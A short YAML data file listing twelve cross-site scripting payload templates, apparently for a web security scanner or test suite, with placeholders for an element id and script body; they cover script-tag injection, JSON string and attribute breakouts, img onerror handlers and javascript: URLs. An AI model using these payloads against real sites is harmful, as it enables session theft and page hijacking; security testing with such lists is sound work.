xss_payloads:
    script: <script x>%2$s</script>
    script_escaped_tag: "<div>Lorem text &lt;script x&gt;%2$s&lt;/script&gt;</div>"
    script_broken_tag: <desc><![CDATA[</desc><script x>%2$s</script>]]>
    break_json_single_quote: "';%2$s//';%2$s//"
    break_json_double_quote: '";%2$s//";%2$s//'
    close_script_tag: '--></SCRIPT>">''><SCRIPT x>%2$s</SCRIPT>'
    image_onerror: <img src=x onerror=%2$s id=%1$s>
    image_src: <IMG SRC=JaVaScRiPt:%2$s id=%1$s>
    title: </TITLE><SCRIPT x>%2$s</script>
    js_src: javascript:%2$s
    break_attribute_single_quote: ''' x=%1$s onclick=%2$s \'
    break_attribute_double_quote: '" x=%1$s onclick=%2$s \'
